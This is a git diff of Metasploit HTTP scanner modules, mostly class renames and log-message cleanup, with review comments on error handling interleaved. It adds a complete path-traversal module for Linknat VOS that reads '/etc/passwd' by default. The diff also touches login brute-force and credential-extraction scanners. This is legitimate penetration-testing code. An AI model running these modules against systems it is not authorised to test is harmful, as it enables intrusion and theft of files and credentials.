@@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary def ini_request(uri) req = {} - case method + case http_method when 'GET' # Example: Say we have the following datastore['PATH'] # '/test.php?page=1&id=3¬e=whatever' @@ -162,7 +162,7 @@ class Metasploit3 < Msf::Auxiliary this_path = uri end - req['method'] = method + req['method'] = http_method req['uri'] = this_path req['headers'] = {'Cookie'=>datastore['COOKIE']} if not datastore['COOKIE'].empty? req['data'] = data if not data.empty? @@ -225,7 +225,7 @@ class Metasploit3 < Msf::Auxiliary :proof => trigger, :name => self.fullname, :category => "web", - :method => method + :method => http_method }) else @@ -289,9 +289,9 @@ class Metasploit3 < Msf::Auxiliary # def is_writable(trigger) # Modify some registered options for the PUT method - tmp_method = method + tmp_method = http_method tmp_data = data - @method = 'PUT' + @http_method = 'PUT' if data.empty? unique_str = Rex::Text.rand_text_alpha(4) * 4 @@ -310,7 +310,7 @@ class Metasploit3 < Msf::Auxiliary send_request_cgi(req, 25) # Prepare request to read our file - @method = 'GET' + @http_method = 'GET' @data = tmp_data req = ini_request(uri) vprint_status("Verifying upload...") @@ -324,7 +324,7 @@ class Metasploit3 < Msf::Auxiliary end # Ah, don't forget to restore our method - @method = tmp_method + @http_method = tmp_method end # @@ -337,8 +337,8 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) # Warn if it's not a well-formed UPPERCASE method - if method !~ /^[A-Z]+$/ - print_warning("HTTP method #{method} is not Apache-compliant. Try only UPPERCASE letters.") + if http_method !~ /^[A-Z]+$/ + print_warning("HTTP method #{http_method} is not Apache-compliant. Try only UPPERCASE letters.") end print_status("Running action: #{action.name}...") diff --git a/modules/auxiliary/scanner/http/http_version.rb b/modules/auxiliary/scanner/http/http_version.rb index 10ac45f37a..2482947127 100644 --- a/modules/auxiliary/scanner/http/http_version.rb 
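Review bot: In `is_writable` (hunks `@@ -289,9 +289,9 @@` through `@@ -324,7 +324,7 @@` of http_traversal.rb), `@http_method` is restored only by the last statement of the method, so an exception raised by `send_request_cgi` in between leaves the override on 'PUT' or 'GET' for any later request made by the same instance. Putting the restore in an `ensure` clause keeps the override scoped to this check: `ensure`, then `@http_method = tmp_method` and `@data = tmp_data`. The method is split across three hunks, so the lines between them are not visible here.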
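Review bot: In the `run_host` hunk (`@@ -337,8 +337,8 @@`), the check `http_method !~ /^[A-Z]+$/` uses line anchors, so a METHOD value containing a newline raises no warning as long as one of its lines is all uppercase. Whole-string anchors match what the warning text describes: `if http_method !~ /\A[A-Z]+\z/`. `run_host` continues after the hunk.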
+++ b/modules/auxiliary/scanner/http/http_version.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/httpbl_lookup.rb b/modules/auxiliary/scanner/http/httpbl_lookup.rb index 3fdc6c3755..248222bd78 100644 --- a/modules/auxiliary/scanner/http/httpbl_lookup.rb +++ b/modules/auxiliary/scanner/http/httpbl_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require "net/dns/resolver" -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/iis_internal_ip.rb b/modules/auxiliary/scanner/http/iis_internal_ip.rb index ab597f3bc7..22258ad680 100644 --- a/modules/auxiliary/scanner/http/iis_internal_ip.rb +++ b/modules/auxiliary/scanner/http/iis_internal_ip.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/influxdb_enum.rb b/modules/auxiliary/scanner/http/influxdb_enum.rb index 4e13b6ad46..680b6a8146 100644 --- a/modules/auxiliary/scanner/http/influxdb_enum.rb +++ b/modules/auxiliary/scanner/http/influxdb_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
@@ -41,29 +41,29 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' ) rescue ::Errno::EPIPE, ::Timeout::Error, ::EOFError, ::IOError => e - print_error("#{peer} - The following Error was encountered: #{e.class}") + print_error("The following Error was encountered: #{e.class}") return end unless res - print_error("#{peer} - Server did not respond in an expected way.") + print_error("Server did not respond in an expected way.") return end if res.code == 401 && res.body =~ /Invalid username\/password/ - print_error("#{peer} - Failed to authenticate. Invalid username/password.") + print_error("Failed to authenticate. Invalid username/password.") return elsif res.code == 200 && res.headers.include?('X-Influxdb-Version') && res.body.length > 0 - print_status("#{peer} - Enumerating...") + print_status("Enumerating...") begin temp = JSON.parse(res.body) if temp.blank? - print_status("#{peer} - Json data is empty") + print_status("Json data is empty") return end results = JSON.pretty_generate(temp) rescue JSON::ParserError - print_error("#{peer} - Unable to parse JSON data.") + print_error("Unable to parse JSON data.") return end print_good("Found:\n\n#{results}\n") @@ -74,9 +74,9 @@ class Metasploit3 < Msf::Auxiliary results, 'InfluxDB Enum' ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Unable to enum, received \"#{res.code}\"") + print_error("Unable to enum, received \"#{res.code}\"") end end end diff --git a/modules/auxiliary/scanner/http/infovista_enum.rb b/modules/auxiliary/scanner/http/infovista_enum.rb index 293613c0c2..9a63b5f10e 100644 --- a/modules/auxiliary/scanner/http/infovista_enum.rb +++ b/modules/auxiliary/scanner/http/infovista_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
diff --git a/modules/auxiliary/scanner/http/ipboard_login.rb b/modules/auxiliary/scanner/http/ipboard_login.rb index 2e32e763ef..6fe82fc2bc 100644 --- a/modules/auxiliary/scanner/http/ipboard_login.rb +++ b/modules/auxiliary/scanner/http/ipboard_login.rb @@ -3,7 +3,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/ipboard' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/jboss_status.rb b/modules/auxiliary/scanner/http/jboss_status.rb index 871adfedaa..e4e06b48c5 100644 --- a/modules/auxiliary/scanner/http/jboss_status.rb +++ b/modules/auxiliary/scanner/http/jboss_status.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/jboss_vulnscan.rb b/modules/auxiliary/scanner/http/jboss_vulnscan.rb index 7c6e5758ab..5f58b1af05 100644 --- a/modules/auxiliary/scanner/http/jboss_vulnscan.rb +++ b/modules/auxiliary/scanner/http/jboss_vulnscan.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/jenkins_command.rb b/modules/auxiliary/scanner/http/jenkins_command.rb index 87c640e6be..92a1b8f735 100644 --- a/modules/auxiliary/scanner/http/jenkins_command.rb +++ b/modules/auxiliary/scanner/http/jenkins_command.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' require 'cgi' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner 
diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index 22318191ab..bb2ad6616b 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb @@ -11,7 +11,7 @@ require 'rex/proto/http' require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -43,17 +43,17 @@ class Metasploit3 < Msf::Auxiliary }) unless res - vprint_error("#{peer} - No response received") + vprint_error("No response received") return end unless res.headers.include?('X-Jenkins') - vprint_error("#{peer} - responded with #{res.code} but does not seem to be Jenkins") + vprint_error("responded with #{res.code} but does not seem to be Jenkins") return end version = res.headers['X-Jenkins'] - print_status("#{peer} - Jenkins Version - #{version}") + print_status("Jenkins Version - #{version}") report_service( :host => rhost, :port => rport, @@ -91,13 +91,13 @@ class Metasploit3 < Msf::Auxiliary 'ctype' => 'text/plain', }) unless res - vprint_error("#{peer} - Timeout") + vprint_error("Timeout") return end case res.code when 200 - print_good("#{peer} - #{uri_path} does not require authentication (200)") + print_good("#{uri_path} does not require authentication (200)") report_note({ :type => "jenkins_path", :host => rhost, 
@@ -120,22 +120,22 @@ class Metasploit3 < Msf::Auxiliary ) end when 403 - print_status("#{peer} - #{uri_path} restricted (403)") + print_status("#{uri_path} restricted (403)") when 401 - print_status("#{peer} - #{uri_path} requires authentication (401): #{res.headers['WWW-Authenticate']}") + print_status("#{uri_path} requires authentication (401): #{res.headers['WWW-Authenticate']}") when 404 - print_status("#{peer} - #{uri_path} not found (404)") + print_status("#{uri_path} not found (404)") when 301 - print_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") + print_status("#{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") when 302 - print_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") + print_status("#{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") else - print_status("#{peer} - #{uri_path} Don't know how to handle response code #{res.code}") + print_status("#{uri_path} Don't know how to handle response code #{res.code}") end end def parse_system_info(body) - vprint_status("#{peer} - Getting useful information from systemInfo") + vprint_status("Getting useful information from systemInfo") infos = { "os.name" => nil, "os.version" => nil, diff --git a/modules/auxiliary/scanner/http/jenkins_login.rb b/modules/auxiliary/scanner/http/jenkins_login.rb index 66bd139aa9..08e6c34881 100644 --- a/modules/auxiliary/scanner/http/jenkins_login.rb +++ b/modules/auxiliary/scanner/http/jenkins_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/jenkins' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
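Review bot: The `when 301` and `when 302` branches of this `case res.code` in jenkins_enum.rb print exactly the same message, so they can be a single branch: `when 301, 302` followed by one `print_status("#{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")`. The message already interpolates `res.code`, so no information is lost by merging them. The enclosing method starts above this hunk.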
diff --git a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb index 0b355c0e4f..3e5d3b02da 100644 --- a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb +++ b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb index 811261b7cc..79ee38026a 100644 --- a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -68,14 +68,14 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to CVE-2015-2562 (search_category_id parameter SQL injection)") + print_good("Vulnerable to CVE-2015-2562 (search_category_id parameter SQL injection)") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb index 2ae1d62bb8..4e959d20a6 100644 --- a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb 
@@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -41,7 +41,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(5) flag = Rex::Text.rand_text_alpha(5) - vprint_status("#{peer} - Checking host") + vprint_status("Checking host") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php'), @@ -85,14 +85,14 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to unauthenticated SQL injection within Gallery WD for Joomla!") + print_good("Vulnerable to unauthenticated SQL injection within Gallery WD for Joomla!") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb index da0562c0b6..f281195326 100644 --- a/modules/auxiliary/scanner/http/joomla_pages.rb +++ b/modules/auxiliary/scanner/http/joomla_pages.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary 'htaccess.txt' ] - vprint_status("#{peer} - Checking for interesting pages") + vprint_status("Checking for interesting pages") pages.each do |page| scan_pages(tpath, page, ip) end @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary note = "Registration Page" end - print_good("#{peer} - #{note}: #{tpath}#{page}") + print_good("#{note}: #{tpath}#{page}") report_note( :host => ip, 
@@ -90,13 +90,13 @@ class Metasploit3 < Msf::Auxiliary return rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") + vprint_error("SSL error") return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") + vprint_error("Unable to Connect") return rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") + vprint_error("Timeout error") return end diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb index a199aef541..16bb6ec313 100644 --- a/modules/auxiliary/scanner/http/joomla_plugins.rb +++ b/modules/auxiliary/scanner/http/joomla_plugins.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary tpath += '/' end - vprint_status("#{peer} - Checking for interesting plugins") + vprint_status("Checking for interesting plugins") res = send_request_cgi({ 'uri' => tpath, 'method' => 'GET' @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary nsize = res.body.size if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize) - print_good("#{peer} - Plugin: #{tpath}#{papp} ") + print_good("Plugin: #{tpath}#{papp} ") report_note( :host => ip, :port => rport, @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary ) if (papp =~/passwd/ and res.body =~/root/) - print_good("#{peer} - Vulnerability: Potential LFI") + print_good("Vulnerability: Potential LFI") report_web_vuln( :host => ip, :port => rport, 
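Review bot: The second `rescue` clause in joomla_pages.rb (hunk `@@ -90,13`) still lists `::ArgumentError` alongside the socket errors and reports it as "Unable to Connect", which would present a programming or option error as a network failure. I would give it its own clause, `rescue ::ArgumentError => e` with `vprint_error("Invalid argument: #{e.message}")`, or drop it from the list if nothing in the `begin` body is expected to raise it. The same rescue list appears in joomla_plugins.rb (`@@ -156,13`) and ntlm_info_enumeration.rb (`@@ -92,13`). The `begin` block starts outside the hunk, so the original reason for rescuing it is not visible here.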
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary :name => 'Local File Inclusion' ) elsif (res.body =~/SQL syntax/) - print_good("#{peer} - Vulnerability: Potential SQL Injection") + print_good("Vulnerability: Potential SQL Injection") report_web_vuln( :host => ip, :port => rport, @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary :name => 'SQL Injection' ) elsif (papp =~/>alert/ and res.body =~/>alert/) - print_good("#{peer} - Vulnerability: Potential XSS") + print_good("Vulnerability: Potential XSS") report_web_vuln( :host => ip, :port => rport, @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) if (res1.code == 200) - print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}") + print_good("Page: #{tpath}index.php?option=com_#{pages}") report_note( :host => ip, :port => datastore['RPORT'], @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary :update => :unique_data ) else - vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") + vprint_error("Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") end end elsif (res.code == 403) @@ -156,13 +156,13 @@ class Metasploit3 < Msf::Auxiliary return rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") + vprint_error("SSL error") return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") + vprint_error("Unable to Connect") return rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") + vprint_error("Timeout error") return end diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb index 3e280c8ad8..c167a2a28c 100644 --- a/modules/auxiliary/scanner/http/joomla_version.rb +++ b/modules/auxiliary/scanner/http/joomla_version.rb 
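Review bot: In the `@@ -129,7` hunk of joomla_plugins.rb, `res1.code` is read straight after `send_request_cgi` with no nil check, although other modules in this diff treat a nil result as "no response" or "timeout". A nil `res1` would raise NoMethodError, which none of the rescue clauses in the `@@ -156,13` hunk list. Guarding the branch with `if res1 && res1.code == 200` and the error line with `elsif res1` would let the scan continue. The same block reports `:port => datastore['RPORT']` where the rest of the method uses `rport`; using `rport` in both places would be consistent. The enclosing method starts outside the hunk.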
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Joomla include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/linknat_vos_traversal.rb b/modules/auxiliary/scanner/http/linknat_vos_traversal.rb new file mode 100644 index 0000000000..63e5630128 --- /dev/null +++ b/modules/auxiliary/scanner/http/linknat_vos_traversal.rb 
@@ -0,0 +1,93 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Linknat Vos Manager Traversal', + 'Description' => %q( + This module attempts to test whether a file traversal vulnerability + is present in version of linknat vos2009/vos3000 + ), + 'References' => [ + ['URL', 'http://www.linknat.com/'], + ['URL', 'http://www.wooyun.org/bugs/wooyun-2010-0145458'] + ], + 'Author' => ['Nixawk'], + 'License' => MSF_LICENSE)) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [true, 'The path of Linknat Vos Manager (/chs/, /cht/, /eng/)', '/eng/']), + OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), + OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 5]) + ], self.class) + end + + def vos_uri(path) + full_uri =~ %r{/$} ? "#{full_uri}#{path}" : "#{full_uri}/#{path}" + end + + def vos_version + case target_uri.to_s + when /chs/i + js_uri = vos_uri('js/lang_zh_cn.js') + when /cht/i + js_uri = vos_uri('js/lang_zh_tw.js') + when /eng/i + js_uri = vos_uri('js/lang_en_us.js') + else + print_warning("#{full_uri} - Please identify VOS version manually") + return + end + + res = send_request_cgi('uri' => js_uri) + return unless res + + vprint_status("#{js_uri} - HTTP/#{res.proto} #{res.code} #{res.message}") + + return unless res.code == 200 + res.body =~ /s\[8\] = \"([^"]*)\"/m ? major = $1 : major = nil + res.body =~ /s\[169\] = \"[^:]*: ([^"\\]*)\"/m ? 
minor = $1 : minor = nil + "#{major} #{minor}" + end + + def run_host(ip) + version = vos_version + unless version + print_error("#{full_uri} - Failed to identify Linknat VOS") + return + end + + traversal = '/%c0%ae%c0%ae' * datastore['TRAVERSAL_DEPTH'] + filename = datastore['FILEPATH'] + + uri = normalize_uri(target_uri.path, '..', traversal, filename) + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri + ) + + if res && res.code == 200 + path = store_loot( + version, + 'text/plain', + ip, + res.body, + filename) + print_good("#{full_uri} - File saved in: #{path}") + else + print_error("#{full_uri} - Nothing was downloaded") + end + end +end diff --git a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb index 4b232b66dc..1cab8ba1ef 100644 --- a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb +++ b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb index bae0916994..fb0bbcdccd 100644 --- a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index 8e65e4407c..a558d21ec3 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb 
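Review bot: `vos_version` in the new linknat_vos_traversal.rb ends with `"#{major} #{minor}"`, which is a non-nil string even when neither regex matched, so the `unless version` guard in `run_host` only catches a failed request or an unknown language path and never a host that is not Linknat VOS. Adding `return unless major || minor` before the final string would make the guard meaningful. `run_host` then passes that version string as the first argument of `store_loot`, where the other modules in this diff pass a fixed type such as `'novell.filereporter.file'`; a constant type (for example `'linknat.vos.traversal'`, name made up here) with the version kept in the printed message would keep loot entries groupable. Any 200 response is stored without looking at the body, so a custom error page served with status 200 would be recorded as the requested file. The two `res.body =~ ... ? major = $1 : major = nil` lines would also read better as `major = res.body[/s\[8\] = \"([^"]*)\"/m, 1]`.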
@@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb index 87668dd476..56f51d3877 100644 --- a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb b/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb index 69fe63fff8..8623f79753 100644 --- a/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb +++ b/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/manageengine_desktop_central' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb index 2204a9ecda..3596a665a0 100644 --- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report 
diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb index 9748b7f676..2dd58d4e3f 100644 --- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb +++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient @@ -48,17 +48,17 @@ class Metasploit3 < Msf::Auxiliary def get_users users = nil - vprint_status("#{peer} - Reading users from master...") + vprint_status("Reading users from master...") res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'ReadUsersFromMasterServlet')) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif res.code == 404 - vprint_error("#{peer} - Could not find 'ReadUsersFromMasterServlet'") + vprint_error("Could not find 'ReadUsersFromMasterServlet'") elsif res.code == 200 && res.body =~ /<discoverydata>(.+)<\/discoverydata>/ users = res.body.scan(/<discoverydata>(.*?)<\/discoverydata>/) - vprint_good("#{peer} - Found #{users.length} users") + vprint_good("Found #{users.length} users") else - vprint_error("#{peer} - Could not find any users") + vprint_error("Could not find any users") end users end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary ] ) - vprint_status("#{peer} - Parsing user data...") + vprint_status("Parsing user data...") users.each do |user| record = parse_user_data(user.to_s) next if record.join.empty? @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary cred_table << [user, pass, hash, role, mail, salt] if pass - print_status("#{peer} - Found weak credentials (#{user}:#{pass})") + print_status("Found weak credentials (#{user}:#{pass})") credential_data = { origin_type: :service, module_fullname: self.fullname, 
diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb index 8774079b5d..5f44f9f3c9 100644 --- a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" fname = datastore['FILE'] - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 500 and res.body =~ /Error report/ - print_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:") + print_error("Cannot obtain '#{fname}', here are some possible reasons:") print_error("\t1. File does not exist.") print_error("\t2. The server does not have any patches deployed.") print_error("\t3. Your 'DEPTH' option isn't deep enough.") @@ -80,10 +80,10 @@ class Metasploit3 < Msf::Auxiliary ) vprint_line(data) - print_good("#{peer} - #{fname} stored as '#{p}'") + print_good("#{fname} stored as '#{p}'") else - print_error("#{peer} - Fail to obtain file for some unknown reason") + print_error("Fail to obtain file for some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb index 6724111d4e..a23e7ede47 100644 --- a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb +++ 